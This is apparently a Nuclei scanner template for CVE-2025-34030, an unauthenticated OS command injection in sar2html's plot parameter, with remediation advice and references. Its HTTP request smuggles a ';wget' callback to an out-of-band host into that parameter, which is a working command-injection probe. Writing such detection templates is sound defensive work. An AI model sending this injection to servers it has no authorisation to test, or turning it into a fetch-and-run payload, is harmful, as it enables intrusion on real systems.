id: CVE-2025-34030 info: name: sar2html <=3.2.2 Plot Parameter - Remote Code Execution author: gy741,TATANKA97 severity: critical description: | sar2html version 3.2.2 and prior contains an OS command injection vulnerability in the plot parameter of index.php. A remote, unauthenticated attacker can append shell metacharacters to the plot parameter and execute arbitrary operating system commands. impact: | Successful exploitation allows unauthenticated remote command execution on the underlying server in the web application process context. remediation: | Remove public access to affected sar2html deployments or apply vendor-provided fixes when available. Restrict access to trusted users and monitor for shell metacharacters in requests to index.php with the plot parameter. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-34030 - https://vulncheck.com/advisories/sar2html-command-injection - https://github.com/cemtan/sar2html - https://www.exploit-db.com/exploits/47204 - https://www.fortiguard.com/encyclopedia/ips/48624 classification: cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H cvss-score: 10.0 cve-id: CVE-2025-34030 epss-score: 0.59067 epss-percentile: 0.98991 cwe-id: CWE-78 metadata: max-request: 1 vendor: cemtan product: sar2html tags: cve,cve2025,sar2html,rce,oast,vkev,vuln http: - raw: - | GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} Accept: */* matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: body words: - "sar2html Ver" - "Select Host" condition: and # digest: 490a00463044022013e045c669451b7fc3df49649ebf192597c1ce835cec5e00c4a4a5195000f1b90220180504370211d950e7e1228b16f601af4c7522507a015d2cc35f26d82b8a81d9:922c64590222798bb761d5b6d8e72950